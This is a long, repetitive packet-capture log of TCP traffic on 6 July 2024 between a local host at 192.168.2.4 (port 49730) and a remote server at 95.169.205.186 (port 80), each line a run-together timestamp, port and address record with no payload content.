                                                              Jul 6, 2024 04:21:59.731947899 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.731975079 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.732791901 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.732803106 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.732839108 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.732940912 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.732950926 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.732980967 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.733005047 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.733134985 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.733145952 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.733155966 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.733177900 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.733198881 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.733278990 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.733289957 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.733300924 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.733320951 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.733339071 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.733551979 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.733561993 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.733572006 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.733582020 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.733601093 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.733613968 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.734355927 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.734366894 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.734376907 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.734405041 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.734421015 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.734498978 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.734509945 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.734519005 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.734529972 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.734545946 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.734568119 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.734791994 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.734802008 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.734829903 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.734854937 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.734960079 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.734972954 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.734985113 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.735008001 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.735025883 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.735372066 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.735383034 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.735392094 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.735404015 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.735415936 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.735445023 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.735527039 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.735537052 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.735546112 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.735557079 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.735565901 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.735568047 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.735591888 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.735615969 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.735688925 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.735699892 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.735709906 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.735718966 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.735735893 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.735761881 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.735838890 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.735850096 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.735867977 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.735877037 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.735884905 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.735908985 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.735930920 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.736124039 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.736136913 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.736145973 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.736155987 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.736172915 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.736191988 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.736268997 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.736279964 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.736289978 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.736299038 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.736318111 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.736330032 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.736582994 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.736594915 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.736624956 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.736649990 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.736732006 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.736742020 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.736751080 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.736759901 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.736778021 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.736804008 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.745870113 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.745879889 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.745889902 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.745920897 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.745943069 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.746293068 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.746304035 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.746313095 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.746323109 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.746334076 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.746340990 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.746345997 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.746367931 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.746381044 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.746448994 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.746459961 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.746469021 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.746479034 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.746488094 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.746501923 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.746530056 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.746874094 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.746920109 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.747569084 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.747580051 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.747589111 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.747612000 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.747637033 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.747713089 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.747724056 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.747734070 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.747745037 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.747761965 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.747786045 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.748022079 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.748033047 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.748042107 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.748053074 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.748064041 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.748069048 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.748076916 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.748087883 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.748094082 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.748106003 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.748127937 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.748457909 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.748467922 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.748477936 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.748501062 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.748517036 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.748610973 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.748622894 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.748631954 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.748641968 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.748658895 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.748686075 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.749059916 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.749069929 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.749080896 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:21:59.749106884 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.749119043 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.795488119 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:21:59.802854061 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.055085897 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.055139065 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.055150986 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.055160046 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.055179119 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.055200100 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.055263042 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.055274963 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.055285931 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.055298090 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.055306911 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.055351973 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.055486917 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.055497885 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.055509090 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.055519104 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.055531979 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.055561066 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.055778027 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.055820942 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.055993080 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.056005001 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.056015968 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.056026936 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.056039095 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.056046009 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.056052923 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.056075096 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.056092024 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.056117058 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.056128979 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.056157112 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.056169033 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.056297064 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.056308985 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.056319952 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.056330919 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.056343079 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.056348085 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.056355953 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.056369066 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.056372881 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.056380987 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.056391001 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.056392908 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.056405067 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.056406021 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.056418896 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.056428909 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.056457996 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.056952000 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.056998014 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.057076931 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.057089090 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.057101011 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.057111979 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.057120085 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.057125092 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.057141066 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.057142019 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.057156086 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.057164907 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.057168961 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.057178020 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.057180882 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.057194948 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.057207108 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.057235003 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.057770014 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.057780981 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.057792902 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.057804108 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.057815075 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.057816982 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.057827950 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.057837009 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.057842016 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.057854891 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.057857037 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.057867050 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.057879925 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.057883024 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.057892084 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.057903051 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.057909966 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.057915926 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.057934046 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.057952881 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.058450937 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.058495998 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.058661938 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.058674097 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.058684111 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.058695078 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.058706045 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.058711052 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.058718920 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.058732033 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.058736086 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.058743954 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.058743954 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.058759928 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.058768034 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.058770895 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.058784008 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.058794022 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.058794975 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.058806896 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.058809042 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.058821917 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.058834076 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.058859110 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.059534073 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.059545994 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.059556007 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.059567928 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.059578896 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.059582949 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.059592009 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.059593916 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.059603930 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.059616089 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.059618950 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.059627056 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.059638977 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.059638977 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.059652090 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.059659958 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.059664011 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.059674978 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.059681892 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.059694052 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.059695959 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.059706926 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.059709072 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.059719086 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.059734106 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.059757948 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.060516119 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.060528040 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.060538054 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.060549974 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.060560942 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.060564995 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.060574055 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.060578108 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.060585976 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.060596943 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.060601950 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.060609102 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.060621023 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.060626030 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.060631990 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.060638905 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.060645103 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.060656071 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.060662031 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.060667992 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.060679913 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.060686111 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.060686111 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.060694933 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.060698032 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.060724020 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.060745001 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.061347961 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.061359882 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.061371088 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.061383009 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.061388969 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.061395884 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.061398983 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.061408997 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.061418056 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.061420918 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.061436892 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.061460018 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.145109892 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.145174980 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.145282984 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.145293951 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.145322084 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.145356894 CEST4973080192.168.2.495.169.205.186
